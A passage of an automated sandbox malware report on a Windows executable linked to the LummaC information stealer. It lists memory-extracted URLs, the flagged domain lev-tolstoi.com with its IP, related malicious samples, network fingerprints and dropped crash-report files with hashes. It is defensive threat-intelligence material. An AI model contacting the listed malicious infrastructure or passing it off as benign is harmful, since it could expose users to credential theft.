                                                                                                                                                                              https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=enSPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=engSPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://www.google.com/images/branding/product/ico/googleg_lodp.icoSPFFah2O2q.exe, 00000000.00000003.1534204760.0000000002EA7000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1534063958.0000000002EAA000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1534124766.0000000002EA7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&aSPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=englSPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://help.steampowered.coSPFFah2O2q.exe, 00000000.00000003.1510014210.0000000000540000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1533066550.0000000000540000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                                                                        		unknown
                                                                                                                                                                                        https://lev-tolstoi.com/ConteSPFFah2O2q.exe, 00000000.00000003.1510014210.0000000000540000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                                                                        		unknown
                                                                                                                                                                                        https://lev-tolstoi.com/apiCSPFFah2O2q.exe, 00000000.00000003.1533195787.0000000000554000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                                                                        		unknown
                                                                                                                                                                                        http://upx.sf.netAmcache.hve.5.drfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://store.steampowered.com/SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=oOCAGrkRfpQ6&l=eSPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.pngSPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                http://127.0.0.1:27060SPFFah2O2q.exe, 00000000.00000003.1510014210.0000000000540000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1533066550.0000000000540000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpgSPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509926082.0000000000507000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://cdn.fastly.steamstatic.cSPFFah2O2q.exe, 00000000.00000003.1510014210.0000000000540000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                    https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gifSPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509926082.0000000000507000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      https://ac.ecosia.org/autocomplete?q=SPFFah2O2q.exe, 00000000.00000003.1534204760.0000000002EA7000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1534063958.0000000002EAA000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1534124766.0000000002EA7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQSPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          http://crt.rootca1.amazontrust.com/rootca1.cer0?SPFFah2O2q.exe, 00000000.00000003.1584367130.0000000002F7D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&ampSPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              https://api.steampowered.com/SPFFah2O2q.exe, 00000000.00000003.1510014210.0000000000540000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                http://store.steampowered.com/account/cookiepreferences/SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1533023771.00000000005A4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                  https://store.steampowered.com/mobileSPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                    https://steamcommunity.com/SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      		high

                                                                                                                                                                                                                      World Map of Contacted IPs

                                                                                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                                                                                      • 75% < No. of IPs

                                                                                                                                                                                                                      Public IPs

                                                                                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                      172.67.157.254
                                                                                                                                                                                                                      		lev-tolstoi.comUnited States
                                                                                                                                                                                                                      		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                      23.55.153.106
                                                                                                                                                                                                                      		steamcommunity.comUnited States
                                                                                                                                                                                                                      		20940AKAMAI-ASN1EUfalse

                                                                                                                                                                                                                      General Information

                                                                                                                                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                      Analysis ID:1580893
                                                                                                                                                                                                                      Start date and time:2024-12-26 12:56:09 +01:00
                                                                                                                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                      Overall analysis duration:0h 5m 29s
                                                                                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                      Report type:full
                                                                                                                                                                                                                      Cookbook file name:default.jbs
                                                                                                                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                      Number of analysed new started processes analysed:10
                                                                                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                                                                                      Technologies:
                                                                                                                                                                                                                      • HCA enabled
                                                                                                                                                                                                                      • EGA enabled
                                                                                                                                                                                                                      • AMSI enabled
                                                                                                                                                                                                                      Analysis Mode:default
                                                                                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                                                                                      Sample name:SPFFah2O2q.exe
                                                                                                                                                                                                                      renamed because original name is a hash value
                                                                                                                                                                                                                      Original Sample Name:d4d4b5b6ca79bb5b57e8ef3791629e47.exe
                                                                                                                                                                                                                      Detection:MAL
                                                                                                                                                                                                                      Classification:mal100.troj.spyw.evad.winEXE@2/5@10/2
                                                                                                                                                                                                                      EGA Information:
                                                                                                                                                                                                                      • Successful, ratio: 100%
                                                                                                                                                                                                                      HCA Information:
                                                                                                                                                                                                                      • Successful, ratio: 94%
                                                                                                                                                                                                                      • Number of executed functions: 20
                                                                                                                                                                                                                      • Number of non-executed functions: 210
                                                                                                                                                                                                                      Cookbook Comments:
                                                                                                                                                                                                                      • Found application associated with file extension: .exe

                                                                                                                                                                                                                      Warnings

                                                                                                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 20.189.173.21, 20.12.23.50, 40.126.53.6
                                                                                                                                                                                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                                                                                      Simulations

                                                                                                                                                                                                                      Behavior and APIs

                                                                                                                                                                                                                      TimeTypeDescription
                                                                                                                                                                                                                      06:57:07API Interceptor13x Sleep call for process: SPFFah2O2q.exe modified
                                                                                                                                                                                                                      06:57:36API Interceptor1x Sleep call for process: WerFault.exe modified

                                                                                                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                                                                                                      IPs

                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                      172.67.157.2544KDKJjRzm8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                        i8Vwc7iOaG.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, StormKitty, VidarBrowse
                                                                                                                                                                                                                          6GNqkkKY0j.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                            Ebgl8jb6CW.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                              3zg6i6Zu1u.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                L5Kgf2Tvkc.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  fkawMJ7FH8.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RedLine, StealcBrowse
                                                                                                                                                                                                                                    Bire1g8ahY.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                      NfwBtCx5PR.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        pJRiqnTih0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          23.55.153.106B8NcU4mckY.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            k6olCJyvIj.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              BeoHXxE7q3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                4KDKJjRzm8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  Zun6NRK3q3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    C8QT9HkXEb.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      0hRSICdcGg.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        6GNqkkKY0j.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                          Ebgl8jb6CW.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                            35K4Py4lii.exeGet hashmaliciousLummaCBrowse

                                                                                                                                                                                                                                                              Domains

                                                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                              lev-tolstoi.com4KDKJjRzm8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 172.67.157.254
                                                                                                                                                                                                                                                              C8QT9HkXEb.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 104.21.66.86
                                                                                                                                                                                                                                                              0hRSICdcGg.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 104.21.66.86
                                                                                                                                                                                                                                                              6GNqkkKY0j.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 172.67.157.254
                                                                                                                                                                                                                                                              Ebgl8jb6CW.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 172.67.157.254
                                                                                                                                                                                                                                                              35K4Py4lii.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 104.21.66.86
                                                                                                                                                                                                                                                              3zg6i6Zu1u.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 172.67.157.254
                                                                                                                                                                                                                                                              oiF7u78bY2.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 104.21.66.86
                                                                                                                                                                                                                                                              L5Kgf2Tvkc.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 172.67.157.254
                                                                                                                                                                                                                                                              fkawMJ7FH8.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RedLine, StealcBrowse
                                                                                                                                                                                                                                                              • 172.67.157.254
                                                                                                                                                                                                                                                              steamcommunity.comB8NcU4mckY.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                              k6olCJyvIj.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                              BeoHXxE7q3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                              4KDKJjRzm8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                              Zun6NRK3q3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                              C8QT9HkXEb.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                              0hRSICdcGg.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                              6GNqkkKY0j.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                              Ebgl8jb6CW.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                              35K4Py4lii.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 23.55.153.106

                                                                                                                                                                                                                                                              ASNs

                                                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                              AKAMAI-ASN1EUB8NcU4mckY.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                              k6olCJyvIj.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                              BeoHXxE7q3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                              4KDKJjRzm8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                              Zun6NRK3q3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                              C8QT9HkXEb.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                              0hRSICdcGg.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                              6GNqkkKY0j.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                              Ebgl8jb6CW.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                              35K4Py4lii.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                              CLOUDFLARENETUSZBbOXn0a3R.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                                              • 172.67.165.185
                                                                                                                                                                                                                                                              4KDKJjRzm8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 172.67.157.254
                                                                                                                                                                                                                                                              P0SJULJxI0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 172.67.165.185
                                                                                                                                                                                                                                                              b0ho5YYSdo.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 104.21.66.113
                                                                                                                                                                                                                                                              C8QT9HkXEb.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 104.21.66.86
                                                                                                                                                                                                                                                              r06aMlvVyM.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 172.67.165.185
                                                                                                                                                                                                                                                              i8Vwc7iOaG.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, StormKitty, VidarBrowse
                                                                                                                                                                                                                                                              • 172.67.150.49
                                                                                                                                                                                                                                                              XM6cn2uNux.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 172.67.165.185
                                                                                                                                                                                                                                                              0hRSICdcGg.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 104.21.66.86
                                                                                                                                                                                                                                                              ZX2M0AXZ56.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 104.21.11.101

                                                                                                                                                                                                                                                              JA3 Fingerprints

                                                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                              a0e9f5d64349fb13191bc781f81f42e1B8NcU4mckY.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 172.67.157.254
                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                              k6olCJyvIj.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 172.67.157.254
                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                              BeoHXxE7q3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 172.67.157.254
                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                              ZBbOXn0a3R.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                                              • 172.67.157.254
                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                              4KDKJjRzm8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 172.67.157.254
                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                              Zun6NRK3q3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 172.67.157.254
                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                              P0SJULJxI0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 172.67.157.254
                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                              b0ho5YYSdo.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 172.67.157.254
                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                              C8QT9HkXEb.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 172.67.157.254
                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                              r06aMlvVyM.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 172.67.157.254
                                                                                                                                                                                                                                                              • 23.55.153.106

                                                                                                                                                                                                                                                              Dropped Files

                                                                                                                                                                                                                                                              No context

                                                                                                                                                                                                                                                              Created / dropped Files

                                                                                                                                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_SPFFah2O2q.exe_6a48b7fef3bc8eb7cc3f861dfe2657df9b428a58_ca89b8e7_fc09b201-b41a-47b1-9609-fd7ee0f9be5c\Report.wer

                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):65536
                                                                                                                                                                                                                                                              Entropy (8bit):1.0590633579224975
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:192:/7ZVqAgFKgX00q44V5mj5WmFXzuiFtZ24IO88Mu:eFK50q44yjDXzuiFtY4IO8e
                                                                                                                                                                                                                                                              MD5:162FFE795E17564D7138676D8837C18C
                                                                                                                                                                                                                                                              SHA1:60D9CB81F18DEA7A474936A07B6C3C6A8F02ECBD
                                                                                                                                                                                                                                                              SHA-256:C45BAC34CC3C6EBB6A5674D8779D2AE270135922DE7ACC862845AB44A32A74C5
                                                                                                                                                                                                                                                              SHA-512:DC706789CD10C04DA0195C72942BC8D57EEB40830D0F90CAADDA8453A3426C1B98230EC1C8FD29C98D3AD932E47F2ECA789EA5B057126632B091A7B9D656501C
                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.6.8.7.8.4.6.3.0.2.4.0.7.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.6.8.7.8.4.6.8.9.6.1.4.9.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.c.0.9.b.2.0.1.-.b.4.1.a.-.4.7.b.1.-.9.6.0.9.-.f.d.7.e.e.0.f.9.b.e.5.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.4.1.e.3.6.e.2.-.1.5.7.f.-.4.0.d.c.-.b.5.5.b.-.d.2.d.8.1.9.e.9.1.d.3.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.P.F.F.a.h.2.O.2.q...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.3.0.0.-.0.0.0.1.-.0.0.1.4.-.b.3.3.e.-.f.2.4.8.8.d.5.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.5.5.a.5.e.b.f.4.3.d.1.d.f.c.2.7.8.0.d.c.6.d.a.4.1.5.7.c.4.a.7.6.0.0.0.0.f.f.f.f.!.0.0.0.0.6.b.8.a.0.d.8.b.8.8.4.5.6.5.2.7.4.8.4.a.3.e.e.d.5.8.f.2.4.9.1.3.1.d.7.4.f.4.3.6.!.S.P.F.F.a.h.2.O.2.q...e.x.e.....T.a.r.g.e.t.A.p.p.

                                                                                                                                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERB7E0.tmp.dmp

                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                              File Type:Mini DuMP crash report, 15 streams, Thu Dec 26 11:57:26 2024, 0x1205a4 type
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):111258
                                                                                                                                                                                                                                                              Entropy (8bit):2.2323158898442985
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:384:qRqNHaJUjBPLAYcrTqIXbzBCNs1jsKxC+wfrEPc:qRqgCjBPLAnrTqIXvBvr05Yk
                                                                                                                                                                                                                                                              MD5:0C986202BA09821A95D99A58BD3A33F7
                                                                                                                                                                                                                                                              SHA1:0C6A1B9418C96B1F604AAF892FC2130B4C21E293
                                                                                                                                                                                                                                                              SHA-256:9E2A9B91815FAFD56B09591282D382912B7352769B5AD70C4F0A67B947116BC0
                                                                                                                                                                                                                                                              SHA-512:4026617D9EA5F95947B198CBE98B178E349367EC6AE13C32A50181EA67CEE94B8C5EE64F16DA44CA54F768424310EEA10C8F117A23A6E25A09E581BD721BF12A
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                              Preview:MDMP..a..... ........Dmg........................p...........,...h$...........Q..........`.......8...........T...........`F..:l...........%...........'..............................................................................eJ.......(......GenuineIntel............T............Dmg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERB90A.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):8358
                                                                                                                                                                                                                                                              Entropy (8bit):3.7011479887473406
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:192:R6l7wVeJkt46dIS6YSFSUz1Agmf6bsbpDM89bXXsfd9m:R6lXJT6OS6YASUzCgmfes3XcfW
                                                                                                                                                                                                                                                              MD5:A65C8A6582F2AC13013A1E2A62C6AD1F
                                                                                                                                                                                                                                                              SHA1:87D3ED6652575DF058BE7FA74B772B6405DF50CF
                                                                                                                                                                                                                                                              SHA-256:CD7655B2AB200D0BF6DFD1666354D128EFA8F2C2084EFBCA715A7A51D638ECBE
                                                                                                                                                                                                                                                              SHA-512:D8184B8A6822A0DC6DA96211C02882EC6C0ACE62BDDBB4FE144944E730DE07E607ACC18D162F995CFC497D6DF10561DA01D67DD1362E5BD7157197F282AC0C8A
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Reputation:low
